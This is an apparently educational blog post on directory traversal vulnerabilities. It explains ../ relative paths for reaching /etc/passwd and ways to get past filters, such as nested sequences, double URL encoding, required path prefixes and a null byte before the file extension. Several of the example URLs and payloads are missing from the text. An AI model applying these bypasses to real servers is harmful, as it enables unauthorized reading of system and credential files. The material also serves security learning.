Directory Traversal Attack: Security Misconfiguration
What is Directory Traversal Attack?
Web applications are comprised of two categories of files:
- Configuration files or elements on the file system (The URLs on the web server route to specific configuration files).
Usually, the contents of the system are organized in the same way as the web application’s URL layout. A badly designed webpage may retrieve resources that have not been made available to the public. This allows a hacker to download or read crucial information about the system. This can also enable an attacker to inject malicious payloads, copy the data and also modify the data.
How To Detect Directory Traversal Attack Or Vulnerability?
In most common scenarios you can check the vulnerability in the get parameters. You can see this by looking at this URL:
Examine the end of the URL
This page has to get a parameter filename with the value 30.jpg. You can play around with this parameter to check if there is any vulnerability or not by manipulating the file name. Usually, you have to check using different payloads because of filtration and error handling. I have tried 31.jpg in place of 30.jpg and it returned another image to me.
How to Access Arbitrary Files with Directory Traversal Attack?
In a web application, we can use the relative or absolute path of the file or directory to navigate to multiple directories. Let’s say, there is a file named “passwd” that is located in the path /etc/passwd. So, this path of the file from the root directory is known as absolute path.
When we are on the web, the working directory is /var/www/html (because all the web pages are stored in this directory). To perform the directory Traversal, we will have to reach the path of the file that we want to retrieve (in this case “passwd” file). You can try to get the file “passwd” by entering its absolute path that is /etc/passwd. If this does not work, the other way is to get the file by entering its relative path in the URL.
What is relative path of a file: The path of a file relative to current working directory is called relative path. Let’s say we are on web browser. Also assume that we want to access the file whose absolute path is /etc/passwd. As mentioned before, the working directory of web is /var/www/html. So, the relative path of the file will be ../../../etc/passwd.
The payload will look like this is the URL:
Understanding the role of (../)
This symbol takes you one step back in a directory. If you are currently in a directory /var/www/html, typing ../ once will take to the directory /var/www. Typing ../ twice will take you to the directory /var. and typing ../ three-time will take you to the directory /. Since we want to go to /etc/passwd, we have to use the payload ../../../etc/passwd. In this way, we can find out the relative path of any file or directory.
What are the Problems while Exploiting Directory Traversal vulnerability?
The application blocks traversal sequences
Although traversal sequences are blocked, the application accepts the entered path as being relative to a default working directory. You can then access the file by entering its absolute path in the URL.
The application strips path traversal sequences from the user-supplied filename before using it
You might be able to use nested traversal sequences, which will revert to simple traversal sequences when the inner sequence is stripped. Modify the filename as shown below:
You can also try the payload as:
Input including path traversal sequences is rejected by the program
The program rejects input including path traversal sequences. It then uses the input after performing a URL decode. You can then bypass it by using URL-encode. In URL-encoding, the ../ character sometime replaces with %252e%252e%252f (where %252e is for dot symbol and %252f is for slash symbol). You can use the payload as following
In some cases the decoding also uses %2e%2e%2f for ../, you can then use the payload as:
The program transmits the full file path by a request parameter
The program verifies that the input path begins with the specified folder in this case. If the program asks for the file path to be started with /var/www/images, you will have to use the payload as shown below:
The program validates that the given filename ends with the specified file extension
In this case, the program ensures that the extension of a file should be as specified. Let us say if the program always checks
that the extension is .png. You can include the required file extension in the payload following the character %00. You can use the payload as follows: